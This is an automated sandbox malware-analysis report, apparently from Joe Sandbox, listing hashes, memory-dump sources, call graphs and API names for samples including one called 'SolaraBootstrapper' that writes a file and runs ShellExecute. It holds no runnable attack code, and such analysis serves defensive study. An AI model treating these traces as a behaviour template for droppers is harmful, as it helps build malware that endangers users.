                          • Instruction ID: 910e42458e701df06ccd477c9d233b33bec2e2651296c6b668220f5c23a36e45
                          • Opcode Fuzzy Hash: 47437bcc23a30ed3514d229b19c5ebe16cb51d1157fef83049397d5ea63f3266
                          • Instruction Fuzzy Hash: 2F313278A002059FDB04EF68E558ABF77B6FFC4300F108479D611AB3A5DA399D418B91
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2188293967.00000000035DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035DD000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_35dd000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 60aef856905e9625b44bef16752ef6824b1290ace3aef0e90c17e53e63e6bcbe
                          • Instruction ID: 12834d25ac27b3169788fbe4c5e30852eeb4b350b5887df3ffcc6ca71f716616
                          • Opcode Fuzzy Hash: 60aef856905e9625b44bef16752ef6824b1290ace3aef0e90c17e53e63e6bcbe
                          • Instruction Fuzzy Hash: 1221C475508200EFCB15DF58E9C0B26BF65FB88314F24C9ADE90A4A266C73AD456CBA1
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ee03290129313c09becd44d8df86a59d5f9e93ab674d09f38b7be8f99b5871eb
                          • Instruction ID: c84d0d2b770c2dd30255166244f9aab7bc54bfd8b8d4995cac39ed6a357ef3e6
                          • Opcode Fuzzy Hash: ee03290129313c09becd44d8df86a59d5f9e93ab674d09f38b7be8f99b5871eb
                          • Instruction Fuzzy Hash: 19316BB4D063448EDB60DF6AD0887AAFFE2EF88324F28845ED44D97216D674A485CB61
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 73fbd54d15927c539b434740ca4b92c7c052a8276d3d92dbce11b02bfec097f5
                          • Instruction ID: 6dd66d3ac86f584cd0de7da7de8e9157855e5004d9d674eeb03bd19b28714dc8
                          • Opcode Fuzzy Hash: 73fbd54d15927c539b434740ca4b92c7c052a8276d3d92dbce11b02bfec097f5
                          • Instruction Fuzzy Hash: DF212E34A04245CFDB14DF65C854ABDBFF1AF4A319F146299D442AB3A1DB32EC41DB24
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2188293967.00000000035DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035DD000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_35dd000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0f3bc911a5105318758b43dd1e4e571d05dd69add8cf1cdff0bc80bcfb52f074
                          • Instruction ID: c54fa15df8b7d7ed776c3fc2bf204b7a03480e4af56ad167e17ffadce0d93234
                          • Opcode Fuzzy Hash: 0f3bc911a5105318758b43dd1e4e571d05dd69add8cf1cdff0bc80bcfb52f074
                          • Instruction Fuzzy Hash: 7021F575504244DFCB24DF28F9C4B16BFA9FB88314F24C9A9D90B4B366C33AD446CA61
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8acee457854becdcf6016f13df9f02405588fa448d7afe3cd5be3dfffdb9783a
                          • Instruction ID: dd92159159ecc8b456dfe2b0c68fb218d95286e00214df6b097dfb1f4cace2bd
                          • Opcode Fuzzy Hash: 8acee457854becdcf6016f13df9f02405588fa448d7afe3cd5be3dfffdb9783a
                          • Instruction Fuzzy Hash: A1218BB0D053048EDB60DF6AD08839AFFF6EB88314F28C41ED84D97206D6746485CB60
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c62d08e8607b40a3355a2583a5811868423bb4ae48e43cf48d237a94d82fd932
                          • Instruction ID: 670be0386d56a2e3e7cd08821c59118cea5cb1f3da965baccadbb365b4da8c6c
                          • Opcode Fuzzy Hash: c62d08e8607b40a3355a2583a5811868423bb4ae48e43cf48d237a94d82fd932
                          • Instruction Fuzzy Hash: 98112B39700219CFCF04DBA9E9409AE77F6EFCC656B0140A5E909DB325DB34ED068B91
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2188293967.00000000035DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035DD000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_35dd000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 057d58c605ff61dcea1d2f362fa95e4b0c0d59dde82fc64a3d1dc629ed531e57
                          • Instruction ID: ba834e9d5cda58a22869e8400cfaff1eee1f14ebec99cd84e565be3ae1414a23
                          • Opcode Fuzzy Hash: 057d58c605ff61dcea1d2f362fa95e4b0c0d59dde82fc64a3d1dc629ed531e57
                          • Instruction Fuzzy Hash: A6219D76504240DFCF16CF14E9C4B16BF72FB88314F28C5A9D9494A666C33AD46ACBA2
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2188293967.00000000035DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035DD000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_35dd000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1c630ef97dc4b8389091dc56a6dd1508d93e44345cafe45a147f51fb8e987ca5
                          • Instruction ID: 19357d1b5637b3b7ca11e6275031e6e264a3115e1702ebfb9d667618fe1492b0
                          • Opcode Fuzzy Hash: 1c630ef97dc4b8389091dc56a6dd1508d93e44345cafe45a147f51fb8e987ca5
                          • Instruction Fuzzy Hash: 53119075504280DFDB15CF14E5C4B15FFA1FB84318F28C6A9D84A4B666C33AD44ACB61
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 28bff56b3f56478c395de6a96535120180ce7554210ae8b0e457d0d5ffc66c18
                          • Instruction ID: 49e85bdb8dd7523e0b0f606624f447e754baf6f0324cbe3d95c96189252eb765
                          • Opcode Fuzzy Hash: 28bff56b3f56478c395de6a96535120180ce7554210ae8b0e457d0d5ffc66c18
                          • Instruction Fuzzy Hash: CD01D6316097449FC715DB79D59466A7FF0EF45214F1844DED089CB6B2CA61FC44C701
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0ac8384cc4173fbd42ac63f3ded85df62d6cdc213cd791ad60db9761e82d7a24
                          • Instruction ID: dd7eff7e75c8560580a94c2b5b595009627bac6faa4f36eae943fd9f896e75eb
                          • Opcode Fuzzy Hash: 0ac8384cc4173fbd42ac63f3ded85df62d6cdc213cd791ad60db9761e82d7a24
                          • Instruction Fuzzy Hash: EA110935204754CFC728DF75D48086ABBF6EF8931532089ADD44A8B7A0DB36F845CB50
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2188293967.00000000035DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035DD000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_35dd000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 634f106deb00097dd9d4839e6b84cab968a1ee72f9b149fe53f41786afba9e68
                          • Instruction ID: 173fcf988ffa4805b636cbeea7cffb84f77ad7a9e173c7b986bf853fd55f6cd8
                          • Opcode Fuzzy Hash: 634f106deb00097dd9d4839e6b84cab968a1ee72f9b149fe53f41786afba9e68
                          • Instruction Fuzzy Hash: D801807100D3C09FD7228B25AD84652BFB8EF43220F1D84DBE8888F1A3D2695C45C772
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2188293967.00000000035DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035DD000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_35dd000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cc294b09abb4f6d2a640fc7f3890ae7f3ce43cfb49397ce1f84f6a7d90ed4ac1
                          • Instruction ID: f8d7145915085297588ff5ee8a1ed3e56572b21ad2c9d49014617b1d1072a3f6
                          • Opcode Fuzzy Hash: cc294b09abb4f6d2a640fc7f3890ae7f3ce43cfb49397ce1f84f6a7d90ed4ac1
                          • Instruction Fuzzy Hash: 2C01D4710043409AD730CA1AFD84B66BFECFF85320F18C469ED480A256E2799841C6B1
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 93d12ef39a307b1702d9dd5dd65789df9ac404e1b3eb999ab4d248641384ffda
                          • Instruction ID: 9f67290d84618e582ba8f0bca796147062366db6a29e7d64b2fa96b4615aa7c5
                          • Opcode Fuzzy Hash: 93d12ef39a307b1702d9dd5dd65789df9ac404e1b3eb999ab4d248641384ffda
                          • Instruction Fuzzy Hash: 64F0A4753093905FD7118A7A9C94D7B7FE9EF8612070941BAF444C7362D6B4CC04C760
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2365797c64fd2493e41d30cf6c316622ea2375925ca33a7655b4dc6756311bba
                          • Instruction ID: 6fccf5e21d6012dee51d8933879f1a7f432c961ee3a968600ba22eaf2e4cc947
                          • Opcode Fuzzy Hash: 2365797c64fd2493e41d30cf6c316622ea2375925ca33a7655b4dc6756311bba
                          • Instruction Fuzzy Hash: 81F0BE323082645FD7108AAA9C44DBBBFEDEBC9620B04407AF948C3351CAB1CC0086A0
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2188293967.00000000035DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035DD000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_35dd000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 089cc20ff8fbc4e9eed806cebdd1730d1cf27ae6edb8b11576abd6656ad94890
                          • Instruction ID: 68c00f49f0f01eedfa573b3984ffb4f92d96e7011cbbaf70c6ef3892cf9bb670
                          • Opcode Fuzzy Hash: 089cc20ff8fbc4e9eed806cebdd1730d1cf27ae6edb8b11576abd6656ad94890
                          • Instruction Fuzzy Hash: 16F0E7B6200600AFD720CF0AD985C22FBFDEFD4670719C55AE84A4B611C671EC42CAA0
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2df224c25e9ab00195ddec76715a2c2163067f220a64a83e31ad30f630474803
                          • Instruction ID: 64abfd9085bd33990a9e8a0629a2a761ccfe9e01f3ed0497ab7e99092f1e60f6
                          • Opcode Fuzzy Hash: 2df224c25e9ab00195ddec76715a2c2163067f220a64a83e31ad30f630474803
                          • Instruction Fuzzy Hash: 1CF0FC75B042414FD715AB24D0583AB7B71EFC1314F1481AEC5055B756CD795C06C7A1
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b9e697d939a9aca931a88436d400c03cb3f6a463872d687c918e830c740f760b
                          • Instruction ID: 0cd7df7c959450d7222efc2e16b0e3558656a255930a614f99236a49d61b6b3f
                          • Opcode Fuzzy Hash: b9e697d939a9aca931a88436d400c03cb3f6a463872d687c918e830c740f760b
                          • Instruction Fuzzy Hash: ACF05E397152404FC3119B2ED894C76BBF6AFCA71931910DEE099CB372DAA2DC02CB50
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2ae1cdca574633a548897c9c4b9f0a2f6b998c9f9801bf9104cda818d64efd1e
                          • Instruction ID: 7bfce93e935ce5190c83daed7ee3ee219e0db3242aa073acec8562d70176a451
                          • Opcode Fuzzy Hash: 2ae1cdca574633a548897c9c4b9f0a2f6b998c9f9801bf9104cda818d64efd1e
                          • Instruction Fuzzy Hash: 04F082357006149FCB249B6AE844A7F77E9EB882A5B40062DE10AD3310DE71AC458790
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2188293967.00000000035DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035DD000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_35dd000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 554aecd4693e4d0b266c62cba81104dd70c14c719bbff593219bb9345430a95b
                          • Instruction ID: 82b7099682ccae69630762b4056e89701d8e4cdb316f9198546f55e8d71582fd
                          • Opcode Fuzzy Hash: 554aecd4693e4d0b266c62cba81104dd70c14c719bbff593219bb9345430a95b
                          • Instruction Fuzzy Hash: FBF0FF75100640AFD725CF05DD85D23BBF9FF85620B198489E84A5B712C631FC42CF60
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c7ce0b77eb2236cc6f6310d44e0abb87ed9e2a6ccdb4337d763f0488ed6d7556
                          • Instruction ID: 25ddc058608b993b6a66f319aa38b8cde45589ac1d3e325c039129a3ad377949
                          • Opcode Fuzzy Hash: c7ce0b77eb2236cc6f6310d44e0abb87ed9e2a6ccdb4337d763f0488ed6d7556
                          • Instruction Fuzzy Hash: 7DF0A039700515CFDB00DBADE9409AA7BA6EFC86567014195E80ACB324DF34DC068B91
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2f881acb56dee516609e25c30ee345be9caa33b26da16174e58c3b04d34466ae
                          • Instruction ID: 6762cd9e78625ba3c60a3d9066afdf63606839fdb7110020ac8d7c1c4d9c4b83
                          • Opcode Fuzzy Hash: 2f881acb56dee516609e25c30ee345be9caa33b26da16174e58c3b04d34466ae
                          • Instruction Fuzzy Hash: 38F02779A042048BE314BB69D0187EB77A6EFC1314F10813AC6065B399CE3A6802C7E1
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ee8b1dedd5db3db7e0eb23a3973d738f66d386629c71858c552c015cab9a55ee
                          • Instruction ID: 221fc0644ec3079e2702143ad170effa2ef2fff44a1dd72ebb2342c550250a7d
                          • Opcode Fuzzy Hash: ee8b1dedd5db3db7e0eb23a3973d738f66d386629c71858c552c015cab9a55ee
                          • Instruction Fuzzy Hash: 18F054706093404FDB629B78E4DC3967FB1EB46310F0444AED55ACB292CB796884CB51
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9d9d25a5adbda5879deaaa88e57bf93c9c180b00c74c942582934ed417a7a04f
                          • Instruction ID: 26b96994f62e345c4ab3730916e982214422a2878af4c746498d63447ee2babc
                          • Opcode Fuzzy Hash: 9d9d25a5adbda5879deaaa88e57bf93c9c180b00c74c942582934ed417a7a04f
                          • Instruction Fuzzy Hash: C1F0EC3120A7812BC717936E6814C5F7FE9DEC6170304459EE045CB262C994DC05C7B7
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 13cc87d20588010f82cb3659d1d3d0f5861912da89429e6e3c93a95a40619f2b
                          • Instruction ID: f1f8b687693c9e43b998761a0697e1f2aa182164f8342e9baf8688a0edb7f842
                          • Opcode Fuzzy Hash: 13cc87d20588010f82cb3659d1d3d0f5861912da89429e6e3c93a95a40619f2b
                          • Instruction Fuzzy Hash: 1CE068623072424B831733BF14106BA59CE4FE21B8B08177B8560CB2C3DCA5CC0143E1
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 72d4371491910d258364473b548be7aa626e28808351673d2d31a17ee7ac0baf
                          • Instruction ID: 1947c0a1dab5cd2c2c28adb7616599fecb7bba47fecbbf13a74d84678e427062
                          • Opcode Fuzzy Hash: 72d4371491910d258364473b548be7aa626e28808351673d2d31a17ee7ac0baf
                          • Instruction Fuzzy Hash: B5E0E5357406118F8310DB1ED898C2AB7EAEFCEB2571910AAF549CB375DA61EC01CB90
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 992b17435754784a71e07b69a3d875dca94cd57fb68f9b0e6266e30e08ecbee0
                          • Instruction ID: eddbed72f21752788e5071b38fb832ad960e33182e04ea1fc9513f90420f5996
                          • Opcode Fuzzy Hash: 992b17435754784a71e07b69a3d875dca94cd57fb68f9b0e6266e30e08ecbee0
                          • Instruction Fuzzy Hash: 92E02B31B04041A7CB19C29DD8448FAFFB6DFC9320F04847EE80697350DA715816E7E0
                          Memory Dump Source
                          • Source File: 0000000B.00000002.2193366274.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_4ee0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6e39194f79627ff63b87cfeaf9cb0bde4f5572e27e8a20f2d261868c4bd3b6f6
                          • Instruction ID: 45ec0a5de33c77b93df66d97be4705be7a56b078322427fa21c2390ebff00623

                          Execution Graph

                          Execution Coverage:80.5%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:0%
                          Total number of Nodes:28
                          Total number of Limit Nodes:1

                          Callgraph

                          • Executed
                          • Not Executed
                          • Opacity -> Relevance
                          • Disassembly available
                          Callgraph nodes:
                          • 0: Function_00401000
                          • 1: Function_00401410
                          • 2: Function_004014D1
                          • 3: Function_004013B4
                          • 4: Function_0040145B
                          • 5: Function_0040108C
                          Callgraph edges (caller -> callee):
                          • 2 -> 4
                          • 4 -> 1
                          • 4 -> 3
                          • 4 -> 5
                          • 5 -> 0

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 0000000D.00000002.2125880811.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000D.00000002.2125768612.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 0000000D.00000002.2125930016.0000000000402000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 0000000D.00000002.2125930016.0000000000E02000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 0000000D.00000002.2127865702.0000000000E73000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_kx new.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled__getmainargs__set_app_type_controlfpexitmemset
                          • String ID:
                          • API String ID: 3649950142-0

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.2125880811.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000D.00000002.2125768612.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 0000000D.00000002.2125930016.0000000000402000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 0000000D.00000002.2125930016.0000000000E02000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 0000000D.00000002.2127865702.0000000000E73000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_kx new.jbxd
                          Similarity
                          • API ID: ExecuteShellmemset$fclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
                          • String ID: ! @$%s\%s$& @$1 @$`!@$e!@$t!@
                          • API String ID: 3236948872-2690058073

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          Basic blocks:
                          • 28: 401000-40102e (calls malloc)
                          • 29: 401031-401039
                          • 30: 401087-40108b
                          • 31: 40103f-401085
                          Control-flow edges:
                          • 28 -> 29
                          • 29 -> 30
                          • 29 -> 31
                          • 31 -> 29 (loop back to block 29)
                          APIs
                          Strings
                          • />pj)w^wi!p&370^jskbtm-=lzrjeh2*, xrefs: 0040106E
                          Memory Dump Source
                          • Source File: 0000000D.00000002.2125880811.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000D.00000002.2125768612.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 0000000D.00000002.2125930016.0000000000402000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 0000000D.00000002.2125930016.0000000000E02000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 0000000D.00000002.2127865702.0000000000E73000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_kx new.jbxd
                          Similarity
                          • API ID: malloc
                          • String ID: />pj)w^wi!p&370^jskbtm-=lzrjeh2*
                          • API String ID: 2803490479-4076278676
                          • Opcode ID: 6b0f6023af0dde842a795475da203acb5dc2305be251553dc905807124ae4844
                          • Instruction ID: 73f043a98e2a7ee5c63033fe1d48318bea4b72fbf4f694dacf033b8f0cb0a464
                          • Opcode Fuzzy Hash: 6b0f6023af0dde842a795475da203acb5dc2305be251553dc905807124ae4844
                          • Instruction Fuzzy Hash: FA11CCB0E05648EFCB08CFACD5907ADBBF1AF49304F1480AAE856E7391D635AE41DB45

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 34 40145b-4014ae call 4013b4 call 40108c call 401410
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.2125880811.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000D.00000002.2125768612.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 0000000D.00000002.2125930016.0000000000402000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 0000000D.00000002.2125930016.0000000000E02000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 0000000D.00000002.2127865702.0000000000E73000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_kx new.jbxd
                          Similarity
                          • API ID: memset$ExecuteShellstrcmp
                          • String ID: D`:vD`:v$D`:vD`:v
                          • API String ID: 1389483452-3916433284
                          • Opcode ID: 922b65df33b6ed7bcce59c6e1f11fdccde716ae67d3a0a1bab3ccac911db9833
                          • Instruction ID: 76c1b6daecc4063cf20948b66e9e7b3ce613b504874fb2aeec9fcfb98b4de26b
                          • Opcode Fuzzy Hash: 922b65df33b6ed7bcce59c6e1f11fdccde716ae67d3a0a1bab3ccac911db9833
                          • Instruction Fuzzy Hash: 9AF09E75A00208AFCB40EFADD981D8A77F8AB4C304F1044A5FD48E7351D674E9848B55
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2154322374.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_2700000_SolaraBootstrapper.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 67ecd6166a9c2d86ff6a8307bf700f36a1dcb633405764076fb9dc0d3fd9fda1
                          • Instruction ID: e779ff57d77114946edc198d05eefae62c9cf5dcc6c790a1345301bfa5cdd019
                          • Opcode Fuzzy Hash: 67ecd6166a9c2d86ff6a8307bf700f36a1dcb633405764076fb9dc0d3fd9fda1
                          • Instruction Fuzzy Hash: 9AF10674D01629CFDB28EF65D984B9DBBB2BB8A310F1095E9D409B7294DB305E85CF04
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2154322374.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_2700000_SolaraBootstrapper.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1a85a95a09aeefa2d316109b081b273d4f3cd3d63712e006fa548adca29fdea0
                          • Instruction ID: d5c4b252ab6a9e6898d8cf5272b382f5935048d27177dc616b28adad2fe45f1a
                          • Opcode Fuzzy Hash: 1a85a95a09aeefa2d316109b081b273d4f3cd3d63712e006fa548adca29fdea0
                          • Instruction Fuzzy Hash: 44E11874D00629CFDB28EF65D984BDDBBB2BB89310F1095E98449B72A4DB305E85CF04
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2154322374.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_2700000_SolaraBootstrapper.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fad053a24ab4e3fd2513f58c0b477d4156fa8eb4c420efa62580ca4ce838eca9
                          • Instruction ID: d1c143b84ef8b07c9bbcb72d14d34774786e44c699c5f722f26ec0e32ad22942
                          • Opcode Fuzzy Hash: fad053a24ab4e3fd2513f58c0b477d4156fa8eb4c420efa62580ca4ce838eca9
                          • Instruction Fuzzy Hash: A1018B74D09784DFDB16DFB8E48559DBFF0AF4A200B1488EAC84597262E374A919CF01
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2154322374.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_2700000_SolaraBootstrapper.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9ca396318575f9737b4fb590426172653f33866ee9dcf06407e3143ae7647333
